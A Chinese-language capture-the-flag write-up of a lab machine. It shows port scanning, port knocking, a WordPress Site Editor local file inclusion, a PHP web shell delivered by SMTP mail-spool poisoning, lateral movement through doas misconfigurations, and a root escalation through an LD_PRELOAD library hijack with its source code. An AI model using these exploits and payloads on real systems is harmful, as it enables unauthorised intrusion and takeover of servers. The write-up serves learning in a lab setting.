所渗透的靶机IP为192.168.56.123

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 09:05 UTC
Nmap scan report for 192.168.56.123 (192.168.56.123)
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
22/tcp open     ssh
25/tcp filtered smtp
80/tcp open     http
MAC Address: 08:00:27:0D:43:53 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.24 seconds
sudo nmap -sT -sV -sC -O -p22,25,80 192.168.56.123 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 09:06 UTC
Nmap scan report for 192.168.56.123 (192.168.56.123)
Host is up (0.00045s latency).

PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)
|   256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)
|_  256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)
25/tcp filtered smtp
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:0D:43:53 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds

Getshell

扫描到一个note.txt,里面提示knock

knock hard 7000 8000 9000

发现有一个/blog目录,是一个WP网站

发现加载地很慢,查看浏览器的network,添加”hard”到hosts

wpscan --url=http://hard/blog/ --enumerate vp,vt,tt,u

有一个sabine用户

wpscan --url=http://hard/blog/ --enumerate ap --plugins-detection aggressive --api-token=api

得到一个插件漏洞Site Editor <= 1.1.1 - Local File Inclusion (LFI)

http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

成功包含!

虽然可以包含,但是发现包含不到wp-config.php。

鉴于25端口打开了,尝试给sabine用户发邮件,内容为一个一句话木马

nc hard 25          
220 debian ESMTP Postfix (Debian/GNU)
HELO hard
250 debian
MAIL FROM:<test>                      
250 2.1.0 Ok
RCPT TO: sabine
250 2.1.5 Ok
DATA 
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["shell"]) ;?>
.
250 2.0.0 Ok: queued as EE29E80ABD
QUIT
221 2.0.0 Bye

http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/sabine&shell=whoami

可以执行命令了!

做一个反弹shell

横向移动

发现又有doas的SUID

cat /etc/doas.conf
cat /etc/doas.conf
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt

发现可以以sabine身份执行setsid

doas -u sabine /usr/bin/setsid /bin/bash
doas -u leonard /usr/bin/mutt

进到mutt界面之后也是输入一个”!”就可以生成一个shell会话

提权

sudo -l 发现可以无需密码执行”ping”,并且可以用LD_PRELOAD来选择共享库的目录

将/usr/bin/ping放到ida反编译一下,其中调用了getopt函数。

可以写一个getopt函数pwn.c

int getopt(char *s){
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
gcc -shared pwn.c -o /tmp/pwn.so
sudo -u root LD_PRELOAD=/tmp/pwn.so /usr/bin/ping 0.0.0.0

现在我们是root!

提权

对我来时还是很新鲜的房间吧,通过邮件和文件包含来写入webshell,其实原理和之前遇到的apache日志和ssh日志中毒原理差不多。以及提权部分的共享库之类的部分,感觉需要去学习一些linux的内核,二进制部分。